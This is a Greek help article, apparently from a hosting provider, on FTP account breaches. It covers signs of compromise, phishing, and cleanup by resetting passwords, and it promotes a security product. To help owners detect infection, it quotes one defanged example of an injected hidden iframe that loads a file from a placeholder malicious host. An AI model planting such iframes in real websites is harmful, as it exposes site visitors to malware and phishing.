Τι είναι μια παραβίαση FTP;

Για να μετακινήσετε αρχεία μεταξύ του υπολογιστή και του ιστότοπού σας, χρησιμοποιείτε το πρωτόκολλο File Transfer Protocol (FTP). Όπως γίνεται συνήθως με τους υπολογιστές, υπάρχει ένας κωδικός πρόσβασης που σχετίζεται με το πρωτόκολλο — έτσι, μόνο τα άτομα στα οποία έχετε δώσει τον κωδικό θα έχουν πρόσβαση στα αρχεία σας.

Ωστόσο, οι εισβολείς μπορούν εύκολα να μαντέψουν τους απλούς κωδικούς πρόσβασης και να αποκτήσουν πρόσβαση στα αρχεία του ιστότοπού σας. Στη συνέχεια, μπορούν να εισάγουν κακόβουλο κώδικα στον ιστότοπό σας, ο οποίος μπορεί να δημιουργήσει προβλήματα στους υπολογιστές των επισκεπτών σας, ανακατευθύνοντας τους επισκέπτες σε άλλες τοποθεσίες ή εγκαθιστώντας κακόβουλο λογισμικό.

Αν ο λογαριασμός σας έχει παραβιαστεί μέσω FTP, θα υποδείξουμε ορισμένες από τις κύριες ενδείξεις που θα πρέπει να σας προειδοποιήσουν, καθώς και βήματα που μπορείτε να ακολουθήσετε για να καθαρίσετε τα μολυσμένα αρχεία και να αποτρέψετε περαιτέρω ζημιές.

Αναγνωρίζοντας μια παραβίαση FTP

Υπάρχουν ορισμένες ενδείξεις όταν ο ιστότοπός σας έχει παραβιαστεί, συμπεριλαμβανομένων, μεταξύ άλλων, των εξής:

  • Κακόβουλος κώδικας που έχει εισαχθεί στον ιστότοπο
  • Νέοι κατάλογοι με περίεργα ονόματα — συγκεκριμένα, ονόματα τραπεζών ή ιστότοπων κοινωνικής δικτύωσης
  • Νέα αρχεία με περίεργα ονόματα

Ωστόσο, υπάρχουν πολλοί τύποι παραβίασης και ο καθένας έχει τις δικές τους ενδείξεις.

Παρεμβολές κακόβουλου κώδικα

Μετά την παραβίαση του κωδικού πρόσβασής σας, οι εισβολείς μπορούν να τοποθετήσουν κώδικα στον ιστότοπό σας, ο οποίος μπορεί να περιέχει malware ή περιεχόμενο ηλεκτρονικού "ψαρέματος". Συνήθως, όταν προβάλετε τον κώδικα του ιστότοπου, αυτές οι παρεμβολές εμφανίζονται στο επάνω ή στο κάτω μέρος των αρχείων. Επιπλέον, ο παρεμβαλλόμενος κώδικας συνήθως επαναλαμβάνεται σε καθένα από τα μολυσμένα αρχεία. Αυτό σημαίνει ότι μπορείτε πιθανώς να κάνετε αναζήτηση για αυτόν κώδικα και να τον εντοπίσετε γρήγορα κατά τον έλεγχο του περιεχομένου. Δείτε ένα παράδειγμα:

iframename=Twitter scrolling=auto frameborder=no align=center height=5 width=1 ·src=hxxp://badsite.tld/badfile.php?id=someid/iframe>

Περιεχόμενο ηλεκτρονικού "ψαρέματος"

Οι απόπειρες ηλεκτρονικού "ψαρέματος" επιχειρούν να υποκλέψουν ευαίσθητες προσωπικές πληροφορίες, όπως κωδικούς πρόσβασης, αριθμούς πιστωτικών καρτών και αριθμούς κοινωνικής ασφάλισης. Συνήθως, ο εισβολέας στέλνει email σε άτομα με συνδέσεις για έναν ιστότοπο ηλεκτρονικού "ψαρέματος", ο οποίος μιμείται έναν νόμιμο ιστότοπο — αυτός ο ιστότοπος περιέχει τις παγίδες του εισβολέα. Για περισσότερες πληροφορίες, ανατρέξτε στο άρθρο Τι είναι το phishing;

Προστασία του ιστότοπού σας

Υπάρχουν ορισμένα πράγματα που μπορείτε να κάνετε αν πιστεύετε ότι ο ιστότοπός σας έχει δεχθεί επίθεση από εισβολέα.

Επαναφορά του κωδικού πρόσβασής σας

Το πρώτο πράγμα που πρέπει να κάνετε αν πιστεύετε ότι ο ιστότοπός σας έχει παραβιαστεί είναι να αλλάξετε τον κωδικό πρόσβασής σας. Για σχετικές οδηγίες, ανατρέξτε στο άρθρο Επαναφέρετε το όνομα χρήστη και τον κωδικό πρόσβασης στο FTP.

Αν έχετε έναν ιστότοπο που χρησιμοποιεί μια βάση δεδομένων, όπως το WordPress®, θα πρέπει να αλλάξετε και τον κωδικό πρόσβασης της βάσης δεδομένων. Για περισσότερες πληροφορίες, ανατρέξτε στο άρθρο

.

Εκκαθάριση και επαναφορά του λογαριασμού σας

Μετά από την επαναφορά του κωδικού πρόσβασής σας, θα πρέπει επίσης να ελέγξετε όλο το περιεχόμενο φιλοξενίας σας και να καταργήσετε τυχόν κακόβουλο περιεχόμενο. Μπορείτε να το κάνετε αυτό χρησιμοποιώντας το πρόγραμμα διαχείρισης αρχείων του πίνακα ελέγχου (περισσότερες πληροφορίες) ή ένα πρόγραμμα-πελάτη FTP (περισσότερες πληροφορίες).

Αν πιστεύετε ότι δεν έχετε αρκετές γνώσεις για να το κάνετε αυτό (ή απλώς δεν έχετε το χρόνο), προσφέρουμε ένα προϊόν ασφάλειας που ονομάζεται Website Security, το οποίο καταργεί το περισσότερο κακόβουλο περιεχόμενο για λογαριασμό σας. Για περισσότερες λεπτομέρειες, επισκεφτείτε τον ιστότοπό μας εδώ.

Για τους περισσότερους πελάτες, συστήνουμε το Website Security Ultimate 360 μοιρών της SiteLock. Το πρόγραμμα περιλαμβάνει σάρωση και αυτόματη αφαίρεση malware, καθώς και ένα CDN που επιταχύνει τον ιστότοπό σας.


Ήταν χρήσιμο αυτό το άρθρο;
Σας ευχαριστούμε για τα σχόλια. Για να μιλήσετε με έναν εκπρόσωπο της εξυπηρέτησης πελατών, χρησιμοποιήστε τον αριθμό τηλεφώνου υποστήριξης ή την παραπάνω επιλογή συνομιλίας.
Χαιρόμαστε που βοηθήσαμε! Υπάρχει κάτι άλλο που μπορούμε να κάνουμε για εσάς;
Λυπούμαστε. Πείτε μας τι σας μπέρδεψε ή γιατί η λύση δεν ήταν αποτελεσματική για το πρόβλημά σας.